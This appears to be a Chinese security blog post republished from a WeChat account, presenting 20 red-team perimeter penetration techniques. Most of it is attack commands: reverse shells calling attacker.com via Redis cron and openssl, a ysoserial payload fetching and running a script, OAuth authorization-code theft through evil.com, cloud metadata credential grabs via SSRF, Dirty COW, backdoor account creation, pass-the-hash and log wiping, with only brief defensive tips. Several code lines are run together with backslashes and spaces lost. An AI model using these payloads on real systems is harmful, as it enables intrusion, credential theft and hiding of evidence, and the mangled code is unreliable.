20个边界渗透骚操作速成指南!

admin 2025年3月31日13:59:08评论5 views字数 4452阅读14分50秒阅读模式

在网络安全攻防对抗中,边界渗透是红队评估的关键突破口。本文基于ATT&CK框架与实战经验,系统梳理20个经过验证的渗透技巧,涵盖信息收集到权限维持全生命周期,每个技巧均包含工具链、操作步骤及防御建议。

第一章 信息收集篇

技巧1:多维度子域名测绘体系

技术细节

  1. 1. 使用Amass进行被动信息收集:
amass enum -d example.com -config config.ini -o amass_results.txt

配置文件需集成Virustotal、Censys等API密钥提升扫描深度

  1. 2. 证书透明度日志深度利用:
import requeststarget = "example.com"url = f"https://crt.sh/?q=%.{target}&output=json"resp = requests.get(url).json()domains = {item['name_value'for item in resp}

防御方案

  • • 部署证书透明度监控工具CertStream
  • • 禁用DNS泛解析,配置DNS监控告警规则

技巧2:CDN真实IP溯源技术

技术突破点

  1. 1. 利用IPv6基础设施漏洞:
curl -6 http://target.com  # 部分CDN未覆盖IPv6nmap -6 -Pn -sV --script=http-title target_ipv6
  1. 2. 邮件服务关联分析:
SELECT mx_records FROM domain_db WHERE domain='example.com'UNIONSELECT historical_ips FROM ssl_cert_db WHERE org_name='Example Inc.'

案例:2022年某电商平台通过MX记录溯源获取真实IP,成功突破云WAF防护

技巧3:非标端口服务指纹识别

技术升级

  1. 1. 混合扫描方案:
masscan -p1-65535 10.0.0.0/24 --rate=100000 | tee masscan.outnmap -sV -sC -Pn -T4 -iL masscan.out -oA nmap_service_scan
  1. 2. 深度协议解析:
from scapy.allimport *packet = sniff(filter="tcp port 8443", count=10)hexdump(packet[0].load)  # 识别自定义加密协议特征

技巧4:云元数据服务利用

攻击路径

  1. 1. AWS元数据探测:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
  1. 2. 利用SSRF获取临时凭证:
GET/vulnerable?url=http://169.254.169.254/latest/meta-data/HTTP/1.1

防御加固

// AWS IMDSv2配置{"HttpTokens":"required","HttpPutResponseHopLimit":1}

技巧5:员工信息社工库构建

数据来源

  • • LinkedIn高级搜索语法:site:linkedin.com/in "Example Corp"
  • • GitHub代码库敏感信息扫描:
gitleaks detect --source=. -v

第二章 漏洞利用篇

技巧6:Web应用历史漏洞回溯

Wayback Machine深度利用

  1. 1. 时间线分析:
import waybackurl = "example.com"snapshots = wayback.WaybackClient().search(url)for snapshot in snapshots:print(snapshot.timestamp, snapshot.url)
  1. 2. 敏感路径爆破:
wfuzz -c -z file,wordlist/general.txt --hc 404 https://web.archive.org/web/20200101/http://example.com/FUZZ

技巧7:SSRF漏洞链式利用

云环境组合攻击

  1. 1. 阿里云Metadata利用:
GET/ssrf.php?url=http://100.100.100.200/latest/meta-data/HTTP/1.1
  1. 2. 内网Redis提权:
redis-cli -h 172.16.0.12 flushallecho -e "nn*/1 * * * * /bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1nn" | redis-cli -x set 1redis-cli config setdir /var/spool/cron/

技巧8:OAuth 2.0配置缺陷利用

攻击流程

  1. 1. 伪造回调地址:
GET /oauth/authorize?response_type=code&client_id=CLIENT_ID&redirect_uri=http://evil.com/callback
  1. 2. 窃取授权码:
from flask import request@app.route('/callback')defcallback():    code = request.args.get('code')    requests.post('https://oauth.provider/token', data={'code': code,'client_secret''STEALED_SECRET'    })

技巧9:API未授权访问漏洞

Swagger文档利用

  1. 1. 接口枚举:
curl -s https://api.example.com/v2/api-docs | jq '.paths'
  1. 2. 敏感操作探测:
POST/api/v1/admin/usersHTTP/1.1{"username":"attacker","role":"superadmin"}

技巧10:反序列化漏洞利用

ysoserial高级用法

java -jar ysoserial.jar CommonsCollections5 'curl http://attacker.com/shell.sh | bash' > payload.bincurl -X POST --data-binary @payload.bin http://vuln-app.com/deserialize

防御方案

  • • 使用SafeObjectInputStream
  • • 配置serialKiller过滤链

技巧11:容器逃逸漏洞利用

Docker逃逸实战

  1. 1. 特权模式逃逸:
docker run --privileged -it alpinensenter --target 1 --mount --uts --ipc --net --pid
  1. 2. CVE-2021-30465利用:
./cdk run shim-pwn 8080

第三章 权限提升篇

技巧12:Windows服务路径劫持

自动化检测脚本

Get-WmiObject win32_service | Where-Object {$_.PathName -match'".*?"'-and    (Test-Path-Path ($_.PathName -split'"')[1])} | Select Name,PathName

防御加固

icacls "C:Program Files" /deny "Everyone:(OI)(CI)(D,DC)"

技巧13:Linux SUID提权

自动化检测

find / -perm -4000 2>/dev/null | xargs -l ls -la

脏牛漏洞利用

./dirtyc0w /etc/passwd "attacker:x:0:0:root:/root:/bin/bashn"

技巧14:Windows计划任务劫持

实战步骤

  1. 1. 检测可写任务目录:
accesschk.exe -wvcu "C:WindowsSystem32Tasks"
  1. 2. 创建恶意XML任务:
<?xml version="1.0"?><Task><Actions><Exec><Command>cmd.exe</Command><Arguments>/c net user attacker P@ssw0rd! /add</Arguments></Exec></Actions></Task>

技巧15:云实例Metadata提权

AWS临时凭证利用

AWS_ACCESS_KEY_ID=AKIA... AWS_SECRET_ACCESS_KEY=... aws ec2 describe-instances

第四章 横向移动篇

技巧16:Pass-the-Hash攻击

Mimikatz实战

sekurlsa::pth /user:Administrator /domain:corp /ntlm:e45e... /run:cmd.exe

防御检测

  • • 启用Credential Guard
  • • 监控Event ID 4624登录类型

技巧17:Kerberoasting攻击

自动化脚本

Get-DomainUser-SPN | Request-SPNTicket-OutputFormat Hashcat

黄金票据防御

Set-ADAccountPassword-Identity krbtgt -Reset-NewPassword (ConvertTo-SecureString-AsPlainText"新密码"-Force)

技巧18:RDP中间人攻击

Seth工具利用

python seth.py eth0 3389 attacker_ip target_ip

第五章 权限维持篇

技巧19:隐蔽后门创建

Linux隐藏进程

nohupmkfifo /tmp/.x; /bin/sh -i </tmp/.x 2>&1 | openssl s_client -quiet -connect attacker.com:443 >/tmp/.x &

Windows WMI事件订阅

$filterArgs = @{...}$consumerArgs = @{CommandLineTemplate="powershell -enc JABzA..."}

技巧20:日志定向擦除技术

Windows日志清除

wevtutil cl Security /r:dc01.corp.com

Linux痕迹清理

find /var/log -type f -exec sed -i '/192.168.1.100/d' {} ;

第六章 防御体系构建

企业防护建议

  1. 1. 部署网络微分段策略:
interface GigabitEthernet0/1 switchport mode private-vlan
  1. 2. 启用EDR行为监控:
# Elastic检测规则示例alert:when:process.name:"mimikatz.exe"severity:CRITICAL

原文始发于微信公众号(HACK之道):20个边界渗透骚操作速成指南!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月31日13:59:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   20个边界渗透骚操作速成指南!https://cn-sec.com/archives/3901323.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息